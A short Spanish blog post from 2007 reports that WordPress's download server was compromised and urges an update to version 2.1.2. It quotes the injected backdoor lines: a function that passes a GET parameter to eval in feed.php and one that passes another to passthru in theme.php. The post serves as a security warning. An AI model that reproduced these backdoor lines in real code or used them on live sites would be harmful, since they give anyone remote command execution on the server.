Hace unos dias alguien ha entrado en la maquina de descargas de worpress y se han cambiado dos ficheros en wp-include en los cuales han metido codigo para ejecutar codigo por medio de parametro GET. Tal como dicen en la web de wordpress hay que actualizar inmeditamente a la version 2.1.2
El codigo injectado esta en estos dos ficheros:
- wp-includes/feed.php
84 function comment_text_phpfilter($filterdata) {
85 eval($filterdata);
86 }
…..
149 if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
- wp-includes/theme.php
408 function get_theme_mcommand($mcds) {
409 passthru($mcds);
410 }
…
441 if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
This entry was posted
on Sunday, March 4th, 2007 at 12:03 and is filed under Main, Seguridad.
You can follow any responses to this entry through the RSS 2.0 feed.
You can leave a response, or trackback from your own site.
Leave a Comment